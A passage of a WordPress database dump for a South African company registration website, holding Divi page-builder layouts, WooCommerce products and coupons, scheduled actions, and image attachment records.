header_font=\"||||||||\" header_2_font=\"Playfair Display|700|||||||\" header_2_font_size=\"40px\" header_2_line_height=\"1.5em\" header_6_font=\"||||||||\" text_orientation=\"center\" max_width=\"600px\" max_width_last_edited=\"off|desktop\" module_alignment=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" header_2_font_size_tablet=\"30px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Our Services</h2>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px||0px||true\" custom_padding_phone=\"10px||10px||true\" custom_margin=\"20px||20px||true\" custom_padding_last_edited=\"off|desktop\" _builder_version=\"3.22.3\" background_color=\"#e1e2e8\" box_shadow_style=\"preset3\" box_shadow_vertical=\"100px\" box_shadow_blur=\"100px\" box_shadow_spread=\"-60px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" locked=\"off\"][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\"][et_pb_blurb title=\"Company Registrations\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"rgba(0,21,76,0.3)\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.23.3\" header_font=\"Lato|700|||||||\" header_text_color=\"#3550a0\" header_line_height=\"1.5em\" background_color=\"#ffffff\" text_orientation=\"center\" custom_padding=\"40px|20px|40px|20px|true|true\" custom_padding_phone=\"20px||20px||true\" custom_padding_last_edited=\"on|phone\" animation_direction=\"right\" animation=\"off\"][/et_pb_blurb][et_pb_toggle title=\"See More\" _builder_version=\"3.23.3\"]<p>Private Company - Owner Managed</p>\n<p>Private Company - Multiple Shareholders </p>\n<p>Personal Liability Company - For Professionals </p>\n<p>Private Company With custimized MOI</p>\n<p>&nbsp;</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\"][et_pb_blurb title=\"Tax Registrations\" use_icon=\"on\" font_icon=\"%%124%%\" icon_color=\"rgba(0,21,76,0.3)\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.10.2\" header_font=\"Lato|700|||||||\" header_text_color=\"#3550a0\" header_line_height=\"1.5em\" background_color=\"#f9fafc\" text_orientation=\"center\" custom_padding=\"40px|20px|40px|20px|true|true\" custom_padding_phone=\"20px||20px||true\" custom_padding_last_edited=\"on|phone\" animation=\"off\"][/et_pb_blurb][et_pb_toggle title=\"See More\" _builder_version=\"3.23.3\"]<p>Urgent Vat Registration</p>\n<p>Salary Tax Registration (PAYE)</p>\n<p>Tax Clearance Certificate </p>\n<p>Business Income Tax Registration</p>\n<p>Import &amp; Export Code Registration</p>\n<p>VAT Registration.</p>\n<p>&nbsp;</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\"][et_pb_blurb title=\"Company Maintenance \" use_icon=\"on\" font_icon=\"%%52%%\" icon_color=\"rgba(0,21,76,0.3)\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.10.2\" header_font=\"Lato|700|||||||\" header_text_color=\"#3550a0\" header_line_height=\"1.5em\" background_color=\"#f2f3f7\" text_orientation=\"center\" custom_padding=\"40px|20px|40px|20px|true|true\" custom_padding_phone=\"20px||20px||true\" custom_padding_last_edited=\"on|phone\" animation=\"off\"][/et_pb_blurb][et_pb_toggle title=\"See More\" _builder_version=\"3.23.3\"]<p>Annual Returns</p>\n<p>Change in Director/s</p>\n<p>Change In Members</p>\n<p>Change In Corporation Address</p>\n<p>Change In Company Address</p>\n<p>Company &amp; Corporation Restorations </p>\n<p>&nbsp;</p>[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\"][et_pb_blurb title=\"Networking\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"rgba(0,21,76,0.3)\" use_icon_font_size=\"on\" icon_font_size=\"32px\" _builder_version=\"3.10.2\" header_font=\"Lato|700|||||||\" header_text_color=\"#3550a0\" header_line_height=\"1.5em\" background_color=\"#e9ebf1\" text_orientation=\"center\" custom_padding=\"40px|20px|40px|20px|true|true\" custom_padding_phone=\"20px||20px||true\" custom_padding_last_edited=\"on|phone\" animation=\"off\" locked=\"off\"][/et_pb_blurb][et_pb_toggle title=\"See More\" _builder_version=\"3.23.3\"]<p>BEE Affidavit</p>\n<p>What I Need To Know Befor I Start My Business In S.A</p>\n<p>&nbsp;</p>[/et_pb_toggle][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.22.3\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\"][et_pb_button button_url=\"#top\" button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#3550a0\" button_border_width=\"10px\" button_border_color=\"rgba(210,159,104,0)\" button_border_radius=\"100px\" button_font=\"Lato|900|||||||\" button_use_icon=\"off\" background_layout=\"dark\" button_bg_color_hover=\"#4159a0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"#4159a0\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Index Style Landing','','publish','closed','closed','','index-style-landing','','','2019-05-30 13:55:45','2019-05-30 11:55:45','',0,'https://companyregistration.online/?page_id=29573',0,'page','',0),(29583,3,'2019-05-31 15:40:13','2019-05-31 13:40:13','','Zoho Books Cloud Accounting Annual','Zoho Books Cloud Accounting Annual','publish','open','closed','','zoho-cloud-accounting-annually','','','2019-06-13 13:19:37','2019-06-13 11:19:37','',0,'https://companyregistration.online/?post_type=product&#038;p=29583',0,'product','',0),(32945,0,'2019-08-18 13:40:45','2019-08-18 13:40:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5955c44789b6.23642742-kPURA1Y6i1oEOEhhTpO6Mj0mCax7Q2n1','','','2019-08-18 15:42:28','2019-08-18 13:42:28','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32945',0,'scheduled-action','',3),(32947,0,'2019-08-18 14:42:28','2019-08-18 14:42:28','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59650bb34d42.08180256-32f5MmwQHlLAbSxl3fX74O7f7RbiXyGd','','','2019-08-18 16:47:39','2019-08-18 14:47:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32947',1,'scheduled-action','',3),(32946,0,'2019-08-18 13:40:45','2019-08-18 13:40:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5955c472f8a9.46933392-qdHEtCBfW1G2xyN5bKmayVTnTMZW0bgO','','','2019-08-18 15:42:28','2019-08-18 13:42:28','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32946',0,'scheduled-action','',3),(32948,0,'2019-08-18 14:42:28','2019-08-18 14:42:28','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59650bc63bc4.24893762-GmrkUP1tXloXUtwm77aZ8oO2372reIS8','','','2019-08-18 16:47:39','2019-08-18 14:47:39','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32948',1,'scheduled-action','',3),(32950,0,'2019-08-18 15:47:39','2019-08-18 15:47:39','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59749d3a60f4.04661402-hTczbs2Dh14cv5L9nPG8PpJYKEXyqNzT','','','2019-08-18 17:54:05','2019-08-18 15:54:05','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32950',0,'scheduled-action','',3),(32951,0,'2019-08-18 16:54:05','2019-08-18 16:54:05','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5984e281d4a8.76184461-Nqwye6Id6TbA9XFLD1joyb3SagIUrAdE','','','2019-08-18 19:03:30','2019-08-18 17:03:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32951',1,'scheduled-action','',3),(29681,3,'2019-06-03 09:48:41','2019-06-03 07:48:41','[et_pb_section admin_label=\"section\"]\r\n		[et_pb_row admin_label=\"row\"]\r\n			[et_pb_column type=\"4_4\"][/et_pb_column]\r\n		[/et_pb_row]\r\n	[/et_pb_section]','Zoho Books Cloud Accounting Monthly','Select the number of months you require.\r\nProduct comes with a 14 day free trial, we can extend it to 30 days.\r\nSo get the first month <strong>free!</strong>\r\nIf a new company registered by us, we do the <strong>setup at cost.</strong>','publish','open','closed','','zoho-books-cloud-accounting-monthly','','','2019-06-13 16:59:27','2019-06-13 14:59:27','',0,'https://companyregistration.online/?post_type=product&#038;p=29681',0,'product','',0),(29693,3,'2019-06-03 10:56:53','2019-06-03 08:56:53','','ZBannual%20','discount part of Coreg insane offer campaign','publish','closed','closed','','zbannualr405','','','2019-06-04 13:58:23','2019-06-04 11:58:23','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=29693',0,'shop_coupon','',0),(31381,1,'2019-07-18 23:17:33','2019-07-18 21:17:33','','satisfaction-guarantee-2109235_1280','','inherit','open','closed','','satisfaction-guarantee-2109235_1280','','','2019-07-18 23:17:48','2019-07-18 21:17:48','',0,'https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png',0,'attachment','image/png',0),(29809,3,'2019-06-04 15:45:56','2019-06-04 13:45:56','','zoho-box-monthly','','inherit','open','closed','','zoho-box-monthly','','','2019-06-04 15:45:56','2019-06-04 13:45:56','',29681,'https://companyregistration.online/wp-content/uploads/2019/06/zoho-box-monthly.gif',0,'attachment','image/gif',0),(29811,3,'2019-06-04 15:51:22','2019-06-04 13:51:22','','zoho-box-annually','','inherit','open','closed','','zoho-box-annually','','','2019-06-04 15:51:22','2019-06-04 13:51:22','',29583,'https://companyregistration.online/wp-content/uploads/2019/05/zoho-box-annually.gif',0,'attachment','image/gif',0),(29812,3,'2019-06-04 15:54:56','2019-06-04 13:54:56','','regmeless','Private company Owner Managed Registration','publish','closed','closed','','regmeless','','','2019-08-24 14:18:26','2019-08-24 12:18:26','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=29812',0,'shop_coupon','',0),(29813,3,'2019-06-04 15:56:37','2019-06-04 13:56:37','','countmeless','Discount on Zoho annual package','publish','closed','closed','','countmeless','','','2019-06-13 14:10:48','2019-06-13 12:10:48','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=29813',0,'shop_coupon','',0),(29829,3,'2019-06-04 19:21:54','2019-06-04 17:21:54','','zoho-+-company-box-copy','','inherit','open','closed','','zoho-company-box-copy','','','2019-06-04 19:21:54','2019-06-04 17:21:54','',0,'https://companyregistration.online/wp-content/uploads/2019/06/zoho-company-box-copy.gif',0,'attachment','image/gif',0),(29868,1,'2019-06-07 08:54:18','2019-06-07 06:54:18','<!-- wp:divi/placeholder /-->','','','publish','closed','closed','company','29868-2','','','2019-06-07 08:54:20','2019-06-07 06:54:20','',0,'https://companyregistration.online/?page_id=29868',0,'page','',0),(29883,3,'2019-06-07 08:45:17','2019-06-07 06:45:17','[et_pb_section fb_built=\"1\" _builder_version=\"3.24\"][et_pb_row _builder_version=\"3.24\" width=\"99%\" max_width=\"1910px\" gutter_width__hover_enabled=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.24\"][et_pb_text _builder_version=\"3.24\"]<iframe frameborder=\"0\" style=\"height:700px;width:120%;border:none;\" src=\'https://forms.zohopublic.com/mawincnetwork/form/CompanyRegistration/formperma/mdk0h2jkaD4fmb0Fed11B5_Fh\'></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registration Form','','publish','closed','closed','company','company-registration-form','','','2019-06-13 17:03:54','2019-06-13 15:03:54','',0,'https://companyregistration.online/?page_id=29883',0,'page','',0),(31371,1,'2019-07-18 22:21:41','2019-07-18 20:21:41','','secure-1.png','','inherit','open','closed','','secure-1-png','','','2019-07-18 22:21:41','2019-07-18 20:21:41','',0,'https://companyregistration.online/wp-content/uploads/2019/07/secure-1.png',0,'attachment','image/png',0),(31364,1,'2019-07-18 22:21:33','2019-07-18 20:21:33','','bg-graphics.png','','inherit','open','closed','','bg-graphics-png','','','2019-07-18 22:21:33','2019-07-18 20:21:33','',0,'https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png',0,'attachment','image/png',0),(31366,1,'2019-07-18 22:21:40','2019-07-18 20:21:40','','5stars-free-img.png','','inherit','open','closed','','5stars-free-img-png','','','2019-07-18 22:21:40','2019-07-18 20:21:40','',0,'https://companyregistration.online/wp-content/uploads/2019/07/5stars-free-img.png',0,'attachment','image/png',0),(31367,1,'2019-07-18 22:21:40','2019-07-18 20:21:40','','user2.png','','inherit','open','closed','','user2-png','','','2019-07-18 22:21:40','2019-07-18 20:21:40','',0,'https://companyregistration.online/wp-content/uploads/2019/07/user2.png',0,'attachment','image/png',0),(31368,1,'2019-07-18 22:21:41','2019-07-18 20:21:41','','user1.png','','inherit','open','closed','','user1-png','','','2019-07-18 22:21:41','2019-07-18 20:21:41','',0,'https://companyregistration.online/wp-content/uploads/2019/07/user1.png',0,'attachment','image/png',0),(31369,1,'2019-07-18 22:21:41','2019-07-18 20:21:41','','privacy-1.png','','inherit','open','closed','','privacy-1-png','','','2019-07-18 22:21:41','2019-07-18 20:21:41','',0,'https://companyregistration.online/wp-content/uploads/2019/07/privacy-1.png',0,'attachment','image/png',0),(31370,1,'2019-07-18 22:21:41','2019-07-18 20:21:41','','guarantee-1.png','','inherit','open','closed','','guarantee-1-png','','','2019-07-18 22:21:41','2019-07-18 20:21:41','',0,'https://companyregistration.online/wp-content/uploads/2019/07/guarantee-1.png',0,'attachment','image/png',0),(29972,3,'2019-06-10 19:04:39','2019-06-10 17:04:39','','zoho-monthly-2','','inherit','open','closed','','zoho-monthly-2','','','2019-06-10 19:04:39','2019-06-10 17:04:39','',29681,'https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-1.gif',0,'attachment','image/gif',0),(29974,3,'2019-06-10 19:11:04','2019-06-10 17:11:04','','zoho-Annual-2','','inherit','open','closed','','zoho-annual-2','','','2019-06-10 19:11:04','2019-06-10 17:11:04','',29583,'https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-1.gif',0,'attachment','image/gif',0),(30056,1,'2019-06-11 20:53:07','2019-06-11 18:53:07','','security-public.png','','inherit','open','closed','','security-public-png','','','2019-07-23 20:15:02','2019-07-23 18:15:02','',0,'https://companyregistration.online/wp-content/uploads/2019/06/security-public.png',0,'attachment','image/png',0),(30060,1,'2019-06-11 20:53:08','2019-06-11 18:53:08','','30-Day-Guarantee-1.png','','inherit','open','closed','','30-day-guarantee-1-png','','','2019-06-11 20:53:08','2019-06-11 18:53:08','',0,'https://companyregistration.online/wp-content/uploads/2019/06/30-Day-Guarantee-1.png',0,'attachment','image/png',0),(30086,3,'2019-06-12 11:12:21','2019-06-12 09:12:21','[et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" custom_padding=\"21px|0px|54px|0px\" template_type=\"section\"][et_pb_row _builder_version=\"3.24\" width=\"99%\" max_width=\"1784px\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\"][et_pb_tabs _builder_version=\"3.24\" border_style=\"solid\"][et_pb_tab title=\"Submit question/comment\" _builder_version=\"3.24\"]<iframe frameborder=\"0\" style=\"height:800px;width:99%;border:none;\" src=\'https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\'></iframe>[/et_pb_tab][et_pb_tab title=\"Call Us\" _builder_version=\"3.0.58\" body_font=\"||||\" tab_font=\"||||\"]<h3>Call us on</h3>\n<h2>010 592 7717</h2>[/et_pb_tab][et_pb_tab title=\"or Visit Us\" _builder_version=\"3.0.87\" body_font=\"||||||||\" tab_font=\"||||||||\"]<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d7152.366503818647!2d27.8347637!3d-26.320565!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x1e95a606ff9c3e51%3A0x5e1233c7b068d887!2swww.companyregistration.online!5e0!3m2!1sen!2sza!4v1460982421516\" width=\"400\" height=\"300\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\n\n \n\n\n\n\n\n<br/><strong><span style=\"color: #800080;\">Click on the map to obtain directions from your current location to companyregistration.online</span></strong>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','contact us section','','publish','closed','closed','','contact-us-section','','','2019-06-12 11:12:21','2019-06-12 09:12:21','',0,'https://companyregistration.online/et_pb_layout/contact-us-section/',0,'et_pb_layout','',0),(30118,3,'2019-06-12 14:35:07','2019-06-12 12:35:07','Non Profit Organization','Non Profit Organization','Non Profit Organization','publish','open','closed','','non-profit-organization','','','2019-08-15 11:42:31','2019-08-15 09:42:31','',0,'https://companyregistration.online/?post_type=product&#038;p=30118',0,'product','',0),(30170,3,'2019-06-13 12:53:04','2019-06-13 10:53:04','','zoho-monthly-2-small','','inherit','open','closed','','zoho-monthly-2-small','','','2019-06-13 12:53:04','2019-06-13 10:53:04','',29681,'https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-small.gif',0,'attachment','image/gif',0),(30172,3,'2019-06-13 13:09:25','2019-06-13 11:09:25','','zoho-monthly-2-600','','inherit','open','closed','','zoho-monthly-2-600','','','2019-06-13 13:09:25','2019-06-13 11:09:25','',29681,'https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-600.gif',0,'attachment','image/gif',0),(30173,3,'2019-06-13 13:19:17','2019-06-13 11:19:17','','zoho-Annual-2-600','','inherit','open','closed','','zoho-annual-2-600','','','2019-06-13 13:19:17','2019-06-13 11:19:17','',29583,'https://companyregistration.online/wp-content/uploads/2019/05/zoho-Annual-2-600.gif',0,'attachment','image/gif',0),(30432,3,'2019-06-14 11:38:47','2019-06-14 09:38:47','','non-profit-organisation','','inherit','open','closed','','non-profit-organisation','','','2019-06-14 11:38:47','2019-06-14 09:38:47','',30118,'https://companyregistration.online/wp-content/uploads/2019/06/non-profit-organisation.gif',0,'attachment','image/gif',0),(32954,0,'2019-08-18 18:03:30','2019-08-18 18:03:30','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59a014bdda08.80471481-pxJhcnuNcYMgWMa1RsNNErUuW8T7nZ20','','','2019-08-18 20:59:32','2019-08-18 18:59:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32954',0,'scheduled-action','',3),(32953,0,'2019-08-18 18:03:30','2019-08-18 18:03:30','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59a014af3c65.22985846-PFSHX5bjYQsJSgJZtbpD1OJxT100rhzG','','','2019-08-18 20:59:32','2019-08-18 18:59:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32953',0,'scheduled-action','',3),(32955,0,'2019-08-18 19:59:32','2019-08-18 19:59:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59c3821f5d62.77244039-zkhenhJWx7VufKbu6FJAwo4vls2nEwtx','','','2019-08-18 23:30:42','2019-08-18 21:30:42','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32955',1,'scheduled-action','',3),(32957,0,'2019-08-18 22:30:42','2019-08-18 22:30:42','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59efead8f040.95207927-GTGDnKmfvsjuVM0fxb1Ne2e7kzRMKxz4','','','2019-08-19 02:40:10','2019-08-19 00:40:10','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32957',1,'scheduled-action','',3),(30483,3,'2019-06-14 16:08:11','2019-06-14 14:08:11','','companyregistration-web','','inherit','open','closed','','companyregistration-web','','','2019-07-23 19:40:21','2019-07-23 17:40:21','',0,'https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web.png',0,'attachment','image/png',0),(31327,3,'2019-07-18 15:59:44','2019-07-18 13:59:44','This Register is valid for 1 year at point of purchase.','Company Register','Section 50(1) of the <strong>Companies Act</strong> states that every <strong>company</strong> is required to have a <strong>register</strong> of its <strong>shares</strong> and to maintain it in accordance with the statutory requirements.\r\n\r\n&nbsp;','trash','open','closed','','company-register-2__trashed','','','2019-08-26 16:33:17','2019-08-26 14:33:17','',0,'https://companyregistration.online/?post_type=product&#038;p=31327',0,'product','',0),(32952,0,'2019-08-18 16:54:05','2019-08-18 16:54:05','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5984e2cb5684.98416185-uwFVBF9XQgyXCtSFeQk7p5iDFxzuZo12','','','2019-08-18 19:03:30','2019-08-18 17:03:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32952',1,'scheduled-action','',3),(33023,0,'2019-08-20 10:06:20','2019-08-20 10:06:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5bd3de915333.83418882-68HFGyUX3keQFzbvKesjcNOlef7aKofY','','','2019-08-20 13:05:02','2019-08-20 11:05:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33023',1,'scheduled-action','',3),(33022,0,'2019-08-20 10:06:20','2019-08-20 10:06:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5bd3de6e13b1.03531616-cSgrB0f1LqUkVe2y81f824UVsDpJxNr9','','','2019-08-20 13:05:02','2019-08-20 11:05:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33022',1,'scheduled-action','',3),(33024,0,'2019-08-20 12:05:02','2019-08-20 12:05:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5be8a5080a08.32435543-1D6kRkFiMStBHyxV600aW6CVBRJHSu3s','','','2019-08-20 14:33:41','2019-08-20 12:33:41','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33024',1,'scheduled-action','',3),(33026,0,'2019-08-20 13:33:41','2019-08-20 13:33:41','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5c00b1e41768.14052391-r4eNIzU6ntZPzTlSA8JERBZUFsst1Kdd','','','2019-08-20 16:16:17','2019-08-20 14:16:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33026',1,'scheduled-action','',3),(33028,0,'2019-08-20 15:16:17','2019-08-20 15:16:17','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5c2ca45907f3.72824748-avovkVbdjkCB2d3PijA3yrlAvYKwYsNv','','','2019-08-20 19:23:48','2019-08-20 17:23:48','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33028',1,'scheduled-action','',3),(31495,1,'2019-07-20 14:02:14','2019-07-20 12:02:14','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"rgba(196,0,121,0.96)\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/bg-graphics.png\" min_height=\"310px\" custom_padding=\"33px||170px|||\" custom_padding_tablet=\"50px||130px\"][et_pb_row column_structure=\"1_4,1_2,1_4\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|0px|0|0px|false|false\" make_equal=\"on\" module_class=\"vertical-align-middle\" _builder_version=\"3.26.3\" width=\"94%\" max_width=\"1917px\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/CoReg-Insane-Offer-Conversion-Ad.jpg\" _builder_version=\"3.26.3\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"32px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"50px\" header_3_line_height=\"1.1em\" header_3_text_shadow_style=\"preset2\" transform_translate=\"0px|-22px\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\"]<h3>Get Your Company Registered for <span style=\"color: #ffffff;\">R199</span></h3>\n<p><span style=\"font-size: xx-large;\">Save an Incredible R551</span></p>[/et_pb_text][et_pb_text admin_label=\"Headline and Text: You\'re dream body is just click away\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"20px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"40px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" custom_margin=\"-24px||||false|false\" text_line_height_last_edited=\"on|desktop\"]<p>Indecision can be exhausting start your business today</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Headline: Features & Benefits\" _builder_version=\"3.26.3\" text_font=\"Poppins|600|||||||\" text_text_align=\"center\" text_font_size=\"25px\" header_font=\"Poppins||||||||\" header_font_size=\"25px\" header_3_font=\"Poppins||||||||\" header_3_font_size=\"28px\" header_3_line_height=\"1.2em\" background_layout=\"dark\" text_line_height_last_edited=\"on|desktop\"]<h3>Features &amp; Benefits</h3>[/et_pb_text][et_pb_blurb title=\"Simple, Convenient & Professionally done\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Clinically Tested Formula\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][et_pb_blurb title=\"100% Money back Guarantee\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: 100% Guaranteed Weight Gain\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][et_pb_blurb title=\"Professional consultants ready to assist\" use_icon=\"on\" font_icon=\"%%59%%\" icon_color=\"#dafa02\" icon_placement=\"left\" content_max_width=\"1100px\" use_icon_font_size=\"on\" icon_font_size=\"15px\" admin_label=\"Text: Best Results For Regular Consumption\" _builder_version=\"3.26.3\" header_font=\"Poppins|500|||||||\" header_text_color=\"rgba(255,255,255,0.73)\" header_font_size=\"16px\" background_layout=\"dark\" custom_margin=\"||10px|\" custom_padding=\"||||false\"][/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\"][et_pb_row column_structure=\"3_5,2_5\" use_custom_gutter=\"on\" gutter_width=\"1\" custom_padding=\"0px||120px\" custom_padding_tablet=\"||50px\" custom_padding_phone=\"||30px\" custom_margin=\"-180px||||false|false\" make_equal=\"on\" custom_padding_last_edited=\"on|phone\" padding_top_bottom_link_2=\"true\" padding_left_right_link_1=\"true\" padding_left_right_link_2=\"true\" _builder_version=\"3.26.3\" border_radii=\"on|20px|20px|20px|20px\" border_width_all=\"1px\" border_color_all=\"rgba(255,255,255,0)\" box_shadow_style=\"preset2\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" background_color=\"#f9f9f9\" custom_padding=\"30px|40px|50px|40px\" custom_padding_tablet=\"|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|desktop\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Checkout  Shortcode\" _builder_version=\"3.19.11\"][cartflows_checkout][/et_pb_code][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" background_color=\"#edeef2\" custom_padding=\"40px|40px|40px|40px\" custom_padding_tablet=\"30px|30px|30px|30px\" custom_padding_phone=\"20px|20px|20px|20px\" custom_padding_last_edited=\"on|phone\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/satisfaction-guarantee-2109235_1280.png\" align=\"center\" align_tablet=\"center\" align_last_edited=\"on|desktop\" admin_label=\"Money Back Image\" _builder_version=\"3.26.3\" max_width=\"30%\" module_alignment=\"left\" custom_margin=\"||20px|0px|false|false\" custom_padding=\"|||0px|false|false\" filter_hue_rotate=\"14deg\" filter_saturate=\"200%\" filter_brightness=\"107%\" filter_contrast=\"81%\"][/et_pb_image][et_pb_text admin_label=\"Headline and Text: 30 Days Full Refund 